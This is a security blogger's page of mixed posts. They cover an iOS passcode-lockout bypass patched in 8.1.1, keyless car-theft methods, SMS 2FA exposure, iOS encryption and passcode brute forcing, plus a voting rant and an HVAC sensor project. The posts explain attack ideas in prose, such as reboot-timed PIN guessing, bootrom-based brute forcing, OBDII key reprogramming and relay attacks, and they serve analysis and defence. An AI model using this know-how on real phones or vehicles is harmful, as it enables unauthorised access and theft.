Darth Null’s Ramblings

DarthNull.org • About Ⓘ

Hello! I'm David Schuetz.
This is where I ramble about...stuff.

Bypassing the lockout delay on iOS devices

Apple released iOS 8.1.1 yesterday, and with it, a small flurry of bugs were patched (including, predictably, most (all?) of the bugs used in the Pangu jailbreak). One bug fix in particular caught my eye:

Lock Screen
Available for:  iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact:  An attacker in possession of a device may exceed the maximum number of failed passcode attempts
Description:  In some circumstances, the failed passcode attempt limit was not enforced. This issue was addressed through additional enforcement of this limit.
CVE-2014-4451 : Stuart Ryan of University of Technology, Sydney

We’ve seen lock screen “bypasses” before (that somehow kill some of the screen locking application and allow access to some data, even while the phone is locked). But this is the first time I’ve seen anything that could claim to bypass the passcode entry timeout or avoid incrementing the failed attempt count. What exactly was this doing? I reached out to the bug reporter on Twitter (@StuartCRyan), and he assured me that a video would come out shortly.

Well, the video was just released on YouTube, and it’s pretty interesting. Briefly:

This doesn’t appear to reset the attempt count to zero, but it keeps you from waiting between attempts (which can be up to a 60 minute lockout). It also doesn’t appear to increment the failure count, either, which means that if you’re currently at a 15 minute delay, the device will never go beyond that, and never trigger an automatic memory wipe.

Combining this with something like iSEC Partners’ R2B2 Button Basher could easily yield something that could just carefully hammer away at PINs 24x7 until a hit is found (though it’d be SLOW, like 1-2 minutes per attempt….)

Why this even works, I’m not sure. I had presumed that a flag is set somewhere, indicating how long a timeout is required before the next unlock attempt is permitted, which even persists through reboots (under normal conditions). One would think that this flag would be set immediately after the last failed attempt, but apparently there’s enough of a delay that, working at human timescales, you can reboot the phone and prevent the timeout from being written.

Presumably, the timeout and incorrect attempt count is now being updated as close to the passcode rejection as possible, blocking this demonstrated bug.

I may try some other devices in the house later, to see how far back I can repeat the bug. So far, I’ve personally verified it on an iPhone 5S running 8.1.0, and an iPad 2 on 7.0.3. Update: I was not able to make this work on an iPod Touch 4th generation, with iOS 6.1.6, but it’s possible this was just an issue with hitting the buttons just right (many times it seemed to take a screenshot rather than starting up the reboot). On the other hand, the same iOS version (6.1.6) did work on an iPhone 3GS, though again, it took a few tries to make it work.

Why I hate voting.

I just voted, even though pundits and statisticians have proven fairly definitively that my particular vote won’t matter. My district has had a Republican congressman for 30 years and his hand-picked heir is likely to win, and I don’t live in one of the 6 states all the news organizations tell me will decide control of the Senate. I voted because it’s the right thing to do, and because if I don’t vote, I lose the moral right to complain about the idiots in power (and anyone who knows me knows I love to complain.)

But why I hate voting isn’t the issues, or the parties, or the polarized electorate, or the aforementioned futility of my particular involvement. It’s the process. The process makes my blood boil.

For months, we are subjected to constant attack ads, literally he-said-she-said finger pointing about which candidate is the bigger idiot for siding with whichever other idiots are in power.

For weeks, the candidates clutter the countryside with illegally placed campaign signs that aren’t just an eyesore, but can seriously impede traffic safety simply by blocking drivers’ view of oncoming traffic. (Though to be fair, this has gotten much better in Fairfax County over the last few years…I don’t know how they got the candidates to stop, but I’m glad they did it).

I work at home, in my basement. When the doorbell rings, I answer it. Which means I have to interrupt my work, walk upstairs, and attend to whoever is at the door. And then get annoyed when it’s just someone stumping for a politician I don’t care about (or even one I do like). And then they get annoyed when I’m annoyed at them — as if they weren’t the ones being rude by disturbing me in the first place.

Go Away Humans

Then, finally, election day. That’s the worst.

Rather than experiencing relief that it’s all about to be over, my annoyance level spikes to new highs. First, I drop the kids off at their school (for school-provided daycare while the school is closed for election day). There’s no way to get through the front door without running a gauntlet of partisan party representatives handing you their “Sample Ballots” (which conveniently exclude all other parties — not actually a sample at all, but I suppose we’re used to the lies). Sure, there’s a “50 foot exclusion zone” around the entrance, but it’s not possible to park within that zone. So all they have to do is hover around the perimeters and they get you.

But at this point I’m not even there to vote — I’m just there to drop off my kids. (In fact, two Republican candidates even had people camped out in front of the school on Back to School night this year, so even then we weren’t able to escape their harassment). Why the school system doesn’t kick these people off their property is beyond me. (And don’t tell me it’s because of First Amendment rights — politicians can still express their views…they just shouldn’t be allowed to interrupt voters on their way to the polls).

It’s even worse today, because I’ll have to sneak past the same people for parent/teacher conferences this afternoon.

Then when I actually do go to vote, I have to navigate a different set of politicians’ antagonists (because my polling place is in a different school). And I have to present an ID to vote, because there’s an astronomically small chance that someone could be trying to vote illegally (which Never Ever Happens. Seriously.) And after I present my ID, the poll workers ask me to tell them my address — as if it weren’t already printed on my ID. Somehow, going to vote where the poll workers can’t even read the address on my ID doesn’t fill me with confidence.

(No, I know it’s because they want to be sure that I really know my address and am not simply taking someone else’s identity. It’s still bullshit. Next year, I’m reading the address from my ID before I even hand it to them. See what happens then.)

So by the time I’m done, I’ve been harassed by politicians on the radio, on the TV, in my mail, at my front door, on the way to drop off the kids, on my way to conferences with my kids’ teachers, on the way to actually vote, and then while voting, I’m told pretty clearly that the state doesn’t think I’m actually me and am trying to fraudulently cast a ballot. All this after being told again and again by, well, Science, that my vote really doesn’t matter.

It’s amazing that anyone votes at all.

What’s the deal with keyless entry car thefts?

In June of 2013, a few videos started circulating showing people unlocking cars without authorization. Basically, people walking directly up to a car and just opening it, or walking by cars on the street. One of the more interesting videos (watch at about 30 seconds in) showed a thief walking along the street, grabbing a handle in passing, and stopping short when the car unlocked. (interestingly, all the videos I found this morning showed attackers reaching for the passenger side door, which may just be a coincidence…)

Predictably, this was picked up by news organizations all over the world, who talked about the “big problem” this is in the US. Then I didn’t hear much again for a while.

It’s not even a particularly new thing. This story about BMW thefts in 2012 mentions key fob reprogramming, and also work presented by Don Bailey at Black Hat 2011 (in which he discussed starting cars using a text message).

But just recently, it’s been making the news again, with some insurers even reportedly refusing insurance for some vehicles.

But none of these reports really shed any light on what’s actually happening, though I suspect there are a couple of different problems at play. The more recent articles included some clues:

In a statement, Jaguar Land Rover said vehicle theft through the re-programming of remote-entry keys was an on-going problem which affected the whole industry.


“The challenge remains that the equipment being used to steal a vehicle in this way is legitimately used by workshops to carry out routine maintenance … We need better safeguards within the regulatory framework to make sure this equipment does not fall into unlawful hands and, if it does, that the law provides severe penalties to act as an effective deterrent.”

This sounds a lot like the current spate of articles are referring to key fob reprogramming via the OBDII port. Basically, if you get physical access to the car, you can connect something to the diagnostic port and program a new key to work with the car. Bingo, instant key, stolen car.

Then they seem to say that “this attack can be easily mitigated by simply ensuring that thieves don’t get the tightly controlled equipment to reprogram the car.” Heh. Right.

This attack relies on a manufacturer-installed backdoor designed for trusted third parties to do authorized work on the vehicle, and instead is being exploited by thieves. Sound familiar?

I’m actually surprised it’s this simple. I haven’t given it a lot of thought, but I’d bet there are ways this could be improved. Maybe a unique code given to the purchaser of the vehicle that they would keep at home (NOT in the glovebox!) and can be used to program new keys. If they lose that, some kind of trusted process between a dealer and the automaker could retrieve the code from some central store. Of course, that opens up social engineering attacks (a bit harder) and also attacks against the database itself (which only need to succeed once).

Again, this seems like a good real-world example of why backdoors are hard (perhaps nearly impossible) to do safely.

But what about the videos from last year? Those thieves certainly weren’t breaking a window and reprogramming keys…they just touched the car and it opened. For those attacks, something much more insidious seems to be happening, and frankly, I’m amazed that we haven’t figured it out yet.

The thieves might be hitting a button on some device in their pockets (or it’s just automatically spitting out codes in a constant stream) and occasionally they get one right. That seems possible, but improbable. The kinds of rolling codes some remotes use aren’t perfect (especially if the master seed is compromised) but I don’t think they can work that quickly, and certainly not that reliably. (But I could certainly be wrong — it’s been a while since I looked into this).

Also, in these videos, the car didn’t respond until the thief actually touched the door handle. In a couple cases, they held the handle and then appeared to pause while they (perhaps) activated something in their other hand. I’ve wondered if this isn’t exploiting some of the newer “passive” keyless entry systems, where the fob stays in your pocket and is only activated when the car (triggered by a hand on the handle) triggers the fob remotely.

It’s possible there’s a backdoor or some unintended vulnerability in this keyfob exchange, and that’s what’s being exploited. Or even just a hardware-level glitch, like a “whitenoise attack” that simply overwhelms the receiver (as suggested to me this morning by @munin). I’ve also wondered how feasible it might be for a “proxy” attack against an almost nearby fob. For example, if the attacker touches the door handle, and the car asks “are you there, trusted fob?” the fob, currently sitting on the kitchen counter, isn’t within range of the car and so won’t respond. But if the attacker has a stronger radio in their backpack, could they intercept the signal and replay it at a much stronger level, then use a sensitive receiver to collect the response from inside the house and relay it back to the car?

This seems kind of far fetched, and there are probably a great many reasons (not least, Physics) why this might not work. Then again, we’ve demonstrated “near proximity” RFID over fairly large distances, too. And many people probably hang their keys next to the door to the garage, pretty close (within tens of feet) to the car.

It would also be reasonably easy to demonstrate. Too bad we had to sell our Prius to buy a minivan.

The bottom line is this: We’ve seen pretty solid evidence of thefts and break-ins against cars using keyless entry technology. The press love these stories as they drum up eyeballs every 6 months or so. But the public at large really doesn’t get any useful information other than “keyless is bad, mmkay?”

It’d be nice if we could figure out what’s going on and actually fix things.

iPhone SMS forwarding — cool, but may be risky

The recent release of iOS 8 brought with it several cool new features, especially some which more tightly integrate the iOS world with the OS X desktop world. Some of these are limited by physical proximity (like handing off email drafts among devices), while others are require being on the same local subnet (forwarding phone calls to the desktop).

However, one feature apparently Just Works all the time, and that’s SMS message forwarding. If you have an iPhone, running iOS 8, then you can send and receive normal text messages (to your “Green bubble friends”) from your iPad or Yosemite desktop. Even if the phone is the next town over.

This is actually pretty cool — I use text messaging a lot, and while most of the people I communicate with use iPhones, a fair number (especially customers) don’t. If I need to send them something securely, like a password to a document I just emailed them, I have to manually type the password into my iPhone and hope I don’t mess it up. With SMS messages bridged between the systems, now I can just copy out of my password safe and paste right into iMessage.

However, this does raise one possible security issue. Many services which offer Two-Factor Authentication (2FA, or as many are preferring to all this particular brand of 2FA, “two step authentication”), send the 2FA confirmation codes over SMS. The theory being that only the authorized user will have access to that user’s cell phone, and so the SMS will only be seen by the intended person.

But if your SMS messages are also copied to your iPad (which you left on your desk at work) or your laptop or desktop (which, likewise, may be left in the office, out of your control) then password reset messages sent over SMS will appear on those devices too.

Which means that your [fr]enemies at work may be able to easily gain control over some of your accounts, simply by requesting a password reset while you’re at lunch. And, since you’re really enjoying your three-bourbon lunch, you don’t even notice the messages appearing on your phone until it’s too late (at which point you’re alerted, not by the Twitter account reset, but by dozens of replies to the “I’m an idiot!” tweet your co-workers posted on your behalf.)

Fortunately, there’s an easy way to correct this.

In OS X Yosemite, go into the System Preferences application and select “Notifications.” Then go down to “Messages,” and where it says “Show message preview” make sure the pop-up is “when unlocked,” not “always.” If this is set to “when unlocked,” then the contents of SMS messages won’t be displayed when the desktop is locked, only a “you got a message” sort of notification. You might also consider disabling the “Show notifications on lock screen” button just above it, which will even disable the notification of the notification.

Yosemite SMS Notification Settings

In iOS, a similar setting can be found in Settings, also under Notifications:

iOS SMS Notification Settings

However, the control here isn’t quite as fine-grained — you can either show notifications on the lock screen, or not, and if they’re shown at all, then the contents will be displayd as well.

You might consider even preventing SMS notifications from displaying on your primary phone when locked, but if it’s almost never out of your control, then perhaps that’s not a big risk to worry about.

Note that both of these settings apply to iMessages as well as SMS messages.

If you never use SMS messages for account validation (whether you call them 2FA or 2SV or just “validation messages,” then you might not need to worry about this at all. Though it’s probably a good idea to at least consider disabling these notifications anyway…

Even more posts about iOS encryption

The assertion recently made by Apple that “it’s not technically feasible” to decrypt phones for law enforcement has really stirred up several pots.

Many in law enforcement are upset that Apple is “unilaterally” removing a key tool in their investigations (whether that tool has ever been truly “key” is another debate). Some privacy experts hail it as a great step forward. Others say “it’s about time.” And still others debate whether it’s quite as absolute a change as Apple’s making it sound.

I wrote extensively about this earlier this week, trying to pull together technical details from Apple’s “iOS Security” whitepaper and some key conference presentations. What’s amusing, now that I look through my archives, is that I said a lot of the same things 18 months ago.

As I was finishing this weekend’s post, Matthew Green posted a very good explanation as well, a bit higher on the readability scale without losing too many of technical details. He later referred to my own post (thanks!) with an accurate note that we don’t know for certain whether the “5 second delay” in consecutive attempts can be overridden by Apple with a new Secure Enclave firmware.

Also later on Monday, Julian Sanchez published a less technical, much more analytic piece that’s worth reading for some of the bigger picture issues. His Cato Institute post is also a good read, to help understand why backdoors in general are a bad idea, and how this may turn out to be a rerun of the 1990’s Crypto Wars.

And just this morning, Joseph Bonneau posted a great practical analysis of the implications of self-chosen passcodes on the Freedom to Tinker blog. This latest story shows how even though, at a technical level, some strong passcodes may take years to break, in practical terms users don’t pick passcodes that are “random enough”. It even has a pretty graph.

One final suggestion made in Mr. Bonneau’s post (and also voiced by many others in posts or on twitter, including myself) is that a hardware-level “wrong passcode count” seems like a great idea. I’d been concerned about how to integrate that count with the user interface, but then he estimates that “A hard limit of 100 guesses would leave about 3% of users vulnerable” (based on the statistics he presents).

This almost throwaway comment made me wonder — if the user interface is (typically) configured to completely lock, or even wipe, a phone after 10 guesses, then why not let OS-level brute force attempts (initiated through the mythical Apple-signed external boot image) continue until 20 attempts? Then the hardware can simply refuse to attempt any further passcode key derivations, and not even worry about what to do with the phone (lock, wipe, or whatever). If the user has already hit 10 attempts through the UI, this count will never be reached in hardware anyway.

The only hard part about this idea would be finding a secure way for the secure element to know that the passcode was properly entered. If we rely on the operating system to actually verify the passcode, and then notify the secure element, then that notifcation may be subject to spoofing by an attacker. This may be an intractable problem, but I’m confident that it wouldn’t be, and that a workable (or even elegant) solution may be found.

If Apple could add that level of protection, then even a 4-digit numeric passcode could be “strong enough” (provided they stay away from the top-50 or so bad passcodes). And at that point, it would absolutely be “technically infeasible” for Apple to do anything with a locked phone, other than retrieve totally unencrypted data.

A (not so) quick primer on iOS encryption

A few weeks ago, Apple published a message about Apple’s commitment to your privacy. In the section on Government Information Requests, Apple made the following somewhat startling statement:

On devices running iOS 8, your personal data such as photos, messages (including attachments), email, contacts, call history, iTunes content, notes, and reminders is placed under the protection of your passcode. Unlike our competitors, Apple cannot bypass your passcode and therefore cannot access this data. So it's not technically feasible for us to respond to government warrants for the extraction of this data from devices in their possession running iOS 8.

What exactly does this mean? And what was Apple doing before to support law enforcement? Well, to really understand that, we have to go kind of deep into how iOS encryption works. It’s complicated, and I’m not always the best at explaining things, but I’ll try my best.

To really understand it all, I highly recommend Apple’s iOS Security whitepaper. First released in May of 2012, with updates in October 2012, February 2014, and September 2014, the newest version (dated October 2014) includes changes to iOS 8. Also a great reference is “iPhone data protection in depth” by Jean-Baptiste Bédrune and Jean Sigwald of Sogeti, presented at HITB Amsterdam in 2011. Keep these open in other windows as I struggle to explain things. To truly understand what’s going on, those two references are your best bet.

In fact, I’ll probably find it convenient to refer back to these from time to time. I’ll call the iOS paper “ISG” and and the HITB presentation “Sogeti”. I’m sure I’m totally butchering the proper way to cite sources, but I’ve been out of school for over 20 years, so give me a break, okay?

Another good reference is this talk from Black Hat Abu Dhabi 2011, by Andrey Belenko and Dmitry Sklyarov. The diagram on page 46 may be particularly helpful.

Too Long, Didn’t Read

Jump to the bottom.

Or go read Matthew Green’s much simpler explanation, which was posted after I’d finished writing my first draft of this post…

Where to begin?

Let me start by saying that I’m going to gloss over a lot of stuff here. This isn’t a formal presentation, it’s not a whitepaper, it’s not even meant to be a serious reference. This is in response to frustration trying to discuss this on twitter in 140-character bites.

So this is my “Tweet Longer” response. Think of it as the conversation (well, more like endless monologue you’re too polite to extricate yourself from) that I’d have with you if I ran into you at a con and you asked me how all this works.

Full Disk Encryption

Data on iPhones is encrypted.

Okay, glad that’s cleared up.

Well, it wasn’t at first. But starting with iOS 3.0 and the iPhone 3GS, the full filesystem was encrypted. The key for this encryption is not user-selectable, but depends on a UID which is “burned” into the phone’s chips at the factory (Sogeti, pp 4 and 5, also ISG, p 9). The UID is a 256-bit key “fused into the application processor during manufacturing.” Apple further stages that “no software or firmware can read them directly” but can only see the results of encryption using those keys.

The UID key is used to create a key called “key0x89b.” Key0x89b is used in encrypting the device’s flash disk. Because this key is unique to the device, and cannot be extracted from the device, it is impossible to remove the flash memory from one iPhone and transfer it to another, or to read it offline. (And when I say “Impossible,” what I really mean is “Really damned hard because you’d have to brute force a 256-bit AES key.”)

The exact mechanisms used to encrypt the storage are pretty complicated (see Sogeti, pp 31-39). The over-simplified answer is something like this:

Of course, all of this is fully automatic. If you can get access to the file system, you can read the data — the decryption “just works.” The primary protections this adds are:

But the data itself isn’t terribly well protected. If the device is unlocked, or if you can boot off an external drive and read the filesystem, then you can read everything.

Data Protection API

In iOS 4, Apple introduced the Data Protection API (DPAPI). Under DPAPI, several classes of protection were introduced for both files and keychain entries. I’ll focus on just files, but the concepts map relatively cleanly to keychain data as well.

Each file is individually encrypted with a “Class Key.” The class key is simply another random key, but which is applied to any and all files which share the same DPAPI level. For example, all files marked as “FileProtectionComplete” use class 1 (Sogeti, p 15). There are currently four file protection classes, and four (nearly) analogous keychain protection classes (ISG, pp 10-13). The three classes most important to this discussion are:

The keys for all these classes are stored in a “keybag.” There are several keybags — one on the device (the “system keybag,”) another stored on trusted computers (for syncing and backing up devices), and another stored on MDM servers (to remotely unlock a device, in the event you’ve forgotten your passcode). (ISG, pp 14-15).

When a file is encrypted under (for example) “Complete” protection, the system extracts the appropriate class key from the keybag, and encrypts the file using that key. To decrypt the file, the key is again read from the keybag, and the file decrypted.

When you set (or change) a passcode, a key is derived using the system UID, and this key is then used to encrypt individual class keys within the keybag. The key derivation process is complicated, but essentially expands the passcode and a salt, using multiple rounds designed to take about 80 milliseconds, no matter the device. On newer devices (A7 or later processors, which is to say, iPhone 5S, 6, and 6+, the iPad Air, and the Retina iPad Mini) this is augmented with a 5-second delay between failed requests. This delay is added at the hardware level, while the escalating delays seen by the user at the lock screen are all part of the operating system. (ISG, p 11).

Because the passcode key is “entangled” with the UID, it’s not possible to simply extract the encrypted keybag and brute force the passcode on a fast password cracking machine. The key must be decrypted on the device itself, which requires either a jailbroken device or a trusted external boot image (more on those later).

When you lock the device, the decrypted “complete protection” class key is wiped from memory. So the device can no longer read any file encrypted with that protection level, until it’s been unlocked again.

Default Data Protection

When Apple debuted the DPAPI, it was entirely an optional feature, and virtually no applications took advantage of it. For some time, the only Apple application which used any data protection was the Mail app. Under iOS 7, Apple changed the default to “Complete until first authentication”, and any new applications should use this protection level automatically.

Unfortunately, though 3rd party apps would inherit somewhat better protections, it wasn’t the best possible mode. Perhaps Apple left that as an option for developers to avoid making background use too difficult, or perhaps there were other reasons. And Apple opted to exclude most of their own applications from this new default.

Support to Law Enforcement

So what exactly was Apple doing to support police who need access to data on a seized iPhone or iPad? This has never been terribly clear. Every few months, a story seemed to hit the press about Apple unlocking phones for the police, but details were scarce, and speculation rampant.

As far as I have been able to guess, Apple had three avenues for extracting data from a seized iPhone:


As for the first item, I don’t work in forensics and so can’t really speak to what these tools can do. But several open-source tools exist (in particular, the iphone-dataprotection kit by our friends at Sogeti) which can illustrate some of what’s possible.

However, much of the data extracted by these tools may be limited when the device is locked, and no forensic tool can directly bypass encryption provided on a locked device by DPAPI. (this changes if the forensic examiner has access to a desktop used to sync the device, but that’s a whole different blog post.)

Booting a Trusted Image

The second is a bit more complicated. Essentially, you’re booting the device using an external drive as the operating system. But since you’re still “on” the device, the locally-stored keys and UID are still available, and so the entire filesystem can be mounted and read. To prevent just anyone from doing this, iOS devices require the external image to be signed by Apple (so we can’t simply create our own drive and boot off that).

Fortunately (or unfortunately, depending on your point of view) there was a bug in the bootrom on several early iOS devices that allowed an attacker to bypass this signature requirement. So up until (and including) iPhone 4 and iPad 1, it was possible for anyone to perform this attack and extract any non-encrypted data (DPAPI protection level “None”) from the phone. Because the phone has to be rebooted in order to perform this attack, however, in-memory keys for the “complete” and “complete until first authentication” are lost, and so any data protected in those modes cannot be read, even using this approach.

Even Apple, booting from a trusted external image, can’t unlock those protected files. The class keys needed for decryption are stored in the system keybag, which is encrypted using the user’s passcode.

Brute Forcing a Passcode

Well, what about brute forcing a passcode? As I said above, older devices could be booted from an external drive, allowing full access to unencrypted files on the device filesystem. Also available are the library routines needed to decrypt the system keybag. And these routines (as far as we know) don’t have any rate limiting, escalating delays, or lockouts, so a program with access to the filesystem and this API can brute force as long as it needs to.

But the key derivation still needs to happen on the device itself, and each device has its work factor tailored so this takes about 80 mS per guess. So though a weak four-digit number could be cracked in 20 minutes or less, a strong alphanumeric passcode could still take months, years, or centuries to break.

And once Apple patched the bootrom hole (beginning with iPhone 5 and iPad 2), this became impossible for anyone outside of Apple to do anyway.

However, because the possibility remained that Apple could crack the passcode, most iOS security experts still recommend that users choose a strong passcode. Just in case.

There’s no evidence that Apple ever actually offered this as a service to law enforcement. I could see where they might, under the right circumstances, but I can also understand where they might be reluctant to ever offer such a service, for fear of it being abused (or just over-requested).

But by brute forcing the passcode, all the data protection is rendered useless.

What changed with iOS 8?

Two things changed with iOS 8:

The first change only affects anyone trying to brute force a passcode directly on a device, which means this only affects Apple (unless law enforcement, forensics teams, or wily hackers have access to a signed image).

The second change is somewhat more significant, under certain circumstances. A device which has been unlocked once already (since the last reboot) will behave exactly the same as iOS 7. That is, anything which is under the “Complete until first authentication” protection level will be (essentially) unencrypted, since the keys will remain in memory after the first time the user unlocks the device.

Much of the built-in application data was moved under the stricter controls: photos, messages, contacts, call history, etc. — all items which were described in the privacy message quoted way back when I started this. This data, once the phone’s been unlocked once, may still be available using 3rd party forensic tools. However, and here’s what I think is probably key: Once the phone is rebooted, that class key is lost, and the data is unreadable until the user enters their passcode again.

So even Apple, with a trusted external boot image, can’t access the data unless they crack the user’s passcode.

I think this is what Apple referred to when they said that it is “not technically feasible” to respond to warrants for this data.

Could Apple still attempt to brute force the passcode? Yes, possibly. If they’ve ever done that before.

It’s also possible that Apple could (or already has) added brute-force protections to newer iOS hardware, which would prevent even Apple from breaking a user’s passcode. They’ve already added the 5-second delay (for A7-based devices), but whether the hardware enforces escalating delays for consecutive bad attempts has not been disclosed. I suspect that if it were the case, we’d’ve heard by now, but I’ve not personally tried brute forcing passcodes on anything newer than an iPad 1. Maybe this was added in iPhone 6 — but we’ll probably have to wait until they’re jailbroken to be sure.

A Quick Demo

If you’d like to see the difference between iOS 7 and iOS 8 for yourself, here’s a simple test.

  1. Get an iPhone running iOS 7, and another running iOS 8.
  2. Get a landline (or a 3rd cell phone) and make sure each iPhone has that number in its Contacts database (add a name, picture, etc.)
  3. Reboot both phones. Do not unlock either phone.
  4. Call the iOS 7 phone from the 3rd phone. You should see not only the phone’s number, but also the name and picture you put into the Contacts database.
  5. Call the iOS 8 phone. You should see the phone number, and nothing else (since most cellular providers don’t provide name over caller ID).
  6. Unlock the iOS 8 phone, then lock it again.
  7. Call the iOS 8 phone again, and this time, you should see the Contacts entry appear on the locked screen.

This shows how the Contacts database is locked with “complete until first authentication.” After rebooting, the phone simply does not have access to the Contacts database, because the class key is still safely encrypted in the system keybag. Once you unlock it, however, the key is extracted, decrypted, and retained in memory, so the next time you call, the phone can read Contacts and display the information.

(This is also why you can’t connect to your home Wi-Fi after rebooting the phone, but after you’ve unlocked it once, it remains connected even when locked. The keychain entries for Wi-Fi are stored with “complete until first authentication.”) (ISG, p13).

So what about law enforcement?

Well, if the assumptions I am making here are correct (and it’s not just me — I believe many in the iOS security community have come to the same conclusion), then Apple simply cannot provide much beyond very basic forensic-level data on phones, especially once they’ve been powered off.

But to my mind, any such service from Apple was always just a matter of convenience anyway. If a warrant can be issued to seize the data on a phone, then one can be issued to compel the owner of the phone to unlock it. (Yes, I’m aware that this is a legally murky area. Some recent decisions have upheld such orders, while at least one other has struck such an order down. One might be able to fight a court-imposed unlock demand, but it’d almost certainly take a lot of time, and be quite expensive in the long run). (And it should go without saying that there are very many good reasons that I am not a lawyer).

So if the police absolutely need access to the data on a phone, they can (probably) compel the owner to unlock it, and so Apple’s inability to help becomes irrelevant.

They can also (presumably) serve warrants to collect any computers belonging to that user, extract the pairing records from them, and then collect just about anything they want from the phone over USB.

Finally, much of the data on an iOS device will also exist “in the cloud” somewhere. So police can certainly go after those providers as well.

So the bottom line here is that, even without Apple’s help, law enforcement still has many ways to get at the data on a locked iOS device.

Unanswered Questions

Even with the very good documentation from Apple, several questions remain.

Where exactly does the low-level encryption happen? The iOS Security guide says that the UID is “fused” into the application co-processor, and that “no software or firmware can read them directly” (p 9), but on page 6 it says it’s stored in the “Secure Enclave” (which is not to be confused with the “Secure Element” used by NFC and Apple Pay), and that the Secure Enclave has its own software update process.

So is the UID available to the software within the Secure Enclave (SE)? Or are operations utilizing the UID handled by a “black box” within the SE, and only the results of these operations visible to SE firmware (and, as moved from SE to the main processor, to the OS in general)?

Or is it possible that the UID in the context of the Secure Enclave is not the UID used to generate the file protection keys? (If so, I sincerely hope Apple updates their naming system to clarify this, because it’s obviously confusing the heck out of a lot of us).

Has Apple ever provided brute-force passcode breaking services to law enforcement? Has iOS been modified to restrict or eliminate this attack? If not, can Apple theoretically perform such an attack today? If asked, would they refuse? Could they?

What does it all mean?

So, what’s the bottom line? Is there a “TL;DR” summary?

  1. Since the iPhone 3GS, all iOS devices have used a hardware-based AES full-disk encryption that prevents storage from being moved from one device to another, and facilitates a fast wipe of the disk.
  2. Since iOS 4 (iPhone 4), additional protections have been available using the Data Protection API (DPAPI).
  3. The DPAPI allows files to be flagged such that they are always encrypted when the device is locked, or encrypted after reboot (but not encrypted after the user enters their passcode once).
  4. On older devices (up to and including iPhone 4 and iPad 1), a bootrom bug could be exploited to boot off an external image and brute force weak passcodes, as well as read non-encrypted data from the filesystem.
  5. It remains possible (but unproven) that Apple retains the capability to do this on modern devices using a trusted external boot image.
  6. Once a user locks a device with a passcode, the class keys for “complete” encryption are wiped from memory, and so that data is unreadable, even when booting from a trusted external image.
  7. Once a user reboots a device, the “complete until first authentication” keys are lost from memory, and any files under that DPAPI protection level will be unreadable even when booted from an external image.
  8. Under iOS 8, many built-in applications received the “complete until first authentication” protection.
  9. This new protection level means that even when booting from a trusted external image, Apple cannot read data encrypted using that protection, unless they have the user’s passcode.
  10. It may still be possible to use forensic tools to extract data from a locked device. In many ways, iOS 8 behaves exactly like iOS 7 for such tools, if the user has unlocked it at least once after a reboot.
  11. The entire hierarchy of encryption keys, class keys, and keybags, is entangled with a device-specific UID that cannot be extracted from the device nor accessed by on-device software.
  12. Many of the keys are further protected by a key derived from the passcode (and the internal UID).
  13. It is not entirely clear whether the Secure Enclave can be manipulated by Apple or an attacker to bypass any or all of the encryption key hierarchy by gaining direct or indirect access to the UID or derived keys.
  14. It is also unknown whether current devices are vulnerable to a passcode brute force attack by Apple (or anyone with access to a trusted external boot image).
  15. Many of these protections are rendered (somewhat) irrelevant if law enforcement (or a determined adversary) have access to a trusted computer used to sync the device, or potentially to copies of the data existing in cloud-based services.

The bottom line, the real “too long, didn’t read”:

To sum it up in one sentence:

Internet of SCADA, or, why does my HVAC blow?

We live in a house that was new-built, so it’s got all the modern trimmings. It’s also got all the modern cut corners, including an air conditioning system (two, actually) that even 12 years later we’re still struggling with. It seems that every year or two something else goes wrong, especially with the combined cooling / heat pump unit that handles the upstairs.

I’ve been thinking for a while that I should be able to build a temperature monitor to track how the system is running, to detect problems (loss of freon, etc.) early, and maybe even forestall costly repairs. Maybe. So I asked for some Arduino gear for Christmas, and earlier this summer, I finally started playing around with it.

Then…right on schedule, in the height of the summer heat, our upstairs system stopped cooling again. Our HVAC company came out, pumped two pounds of freon into the system (I really gotta start doing that myself — far cheaper), and scheduled a comprehensive leak search for mid-September (just in case we have to disable the system for a long stretch, we wanted it to be in a season where we might not miss it).

Then just before I went to DEF CON, I noticed (using my 20-year-old Radio Shack thermometer) that the AC unit didn’t seem to be cooling as much as before. After returning, it seemed…okay…but still not ideal, so I rushed a (greatly simplified) monitoring circuit into play. I just got it working this week, and already I’m finding some interesting results.

I’m still trying to figure out the best way to sense thermostat calls for compressor, heat, and fans — do I use clip-on current sensors, inline current sensors, voltage drop sensors, opto-isolaters — and how do I integrate those sensors into the 1-Wire bus… So for now, I only have a few temperature sensors.

First, some eye-candy:

Two-day Stripchart

Here, the orange line is one of two sensors on a table (in the next graph they’re individually shown as red and blue). The green line is an outside temperature taken as an average of a few web-accessible weather stations in the area (a few in nearby neighborhoods, plus Dulles airport), so it’s a reasonable approximation of the temperature near my home. Blue is the air temperature at the cold air return directly above the desk (and thermostat), and red is the supply register (output vent) directly above a window, maybe 8 feet from the other three sensors.

One important measurement is the cooling drop produced by the A/C system. Because it’s currently malfunctioning I don’t have the compressor running. But I ran it for three brief periods, about a half hour each, just to see what it looks like on the graph. This is, in fact, the primary reason I wanted to start this project. One typically expects a 10-15 degree temperature drop across an A/C unit’s cooling coil, though the actual drop from cold air return back to the room might be a little less. After we had coolant added in July, my old thermometer measured that drop at just about 10 degrees.

When the compressor ran from about 1:45-2:30 on Tuesday, the supply and return lines were at the same temperature. That is, it showed ZERO cooling effect. When run twice that evening (about 8:00 and again about 11:00) the graph shows 2, maybe 3 degrees of cooling. So, obviously, it’s broken. My long term plan includes emailed and even a beeping alarm unit when this drop habitually reduces below some threshold….so I was glad to see what “broken” looks like so early in the system’s development.

What gets really fun is playing with the furnace fan. For about 90 minutes (after I first turned off the compressor) I left the fan set to “on,” that is, continuously running. The air coming out of the register by the window was consistently 5 or more degrees warmer than what went into the system at the cold air return in the same room. So either I’m getting an ambient heating effect from the vent’s location (in the ceiling, near a large window), or the duct work in the attic is heating things up significantly.

Then I turned off the furnace fan, and the register temperature continued to rise, until I switched to “Circulate,” in which the furnace fan cycles on and off. I’d had no idea how that mode actually worked (I vaguely presumed it was somewhat tied to the thermostat, and might be if the room temperature was actually close to “reasonable”) but here it seems to just be about 15 minutes on, 15 minutes off.

When the fan first kicked in, the register temperature shot up (probably expelling warm air that’s been sitting in the attic ductwork), then it drops a bit, and sort of settles for a bit. Then it drops again (I guess when the fan turns off — again, I really need a sensor on that relay), and then shoots back up again when the fan restarts. You can really see the pattern on Wednesday afternoon, where the low temperature (fan off) seems to be about equal to the room temperature, while the high temperature climbs in a fairly obvious curve.

